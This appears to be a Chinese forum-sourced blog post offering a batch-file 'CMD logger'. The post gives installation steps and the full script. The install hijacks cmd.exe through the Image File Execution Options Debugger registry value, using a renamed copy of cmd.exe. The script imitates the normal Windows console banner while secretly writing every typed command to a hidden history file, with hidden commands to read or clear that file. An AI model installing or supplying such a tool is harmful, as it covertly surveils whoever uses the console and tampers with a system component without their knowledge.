CMD记录器改良版

 文章作者:a11yesno
信息来源:邪恶八进制信息安全团队( www.eviloctal.com

改的不是很良 勉强可用
或许应该弄多一点容错代码 体力活啊。。
安装 把代码保存为cmd.bat 放置system32下 把cmd.exe copy为cmd.gif
注册表 添加
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/cmd.exe
字串 Debugger
字串内容 cmd.gif /c cmd.bat



 

@echo   off  
title %ComSpec% 
rem  CMD 记录器 改良版 
rem
 原作者 superjj(可能是马甲!) 
rem
 原文的地址:https://forum.eviloctal.com/read-htm-tid-13905-fpage-0-toread--page-2.html 
rem
 由我allyesno 改良(是本人不是马甲!) 
rem
 容错代码就不改良了,一些细节部分自己添加! 
setlocal  EnableDelayedExpansion 
echo  Microsoft Windows XP [版本  5.1 . 2600
echo   ( C )  版权所有  1985 - 2001  Microsoft Corp .  
echo .  
for   / l %%i in  ( 0 , 0 , 0 )   do   (  
  
set   / p strCMD = % cd %^ >  
if   " !strcmd! " == " whoami "   echo  allyesno& set  strcmd =  
if   " !strcmd! " == " log "   type  %windir% history . txt& set  strcmd =  
if   " !strcmd! " == " logclear "   del  %windir% history . txt& set  strcmd =  
  
for   / " delims= "  %%i in  ( " !strCMD! " )   do   echo  %%i  >> %windir% history . txt 
  !strCMD! 
  
echo .  
                        
)

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值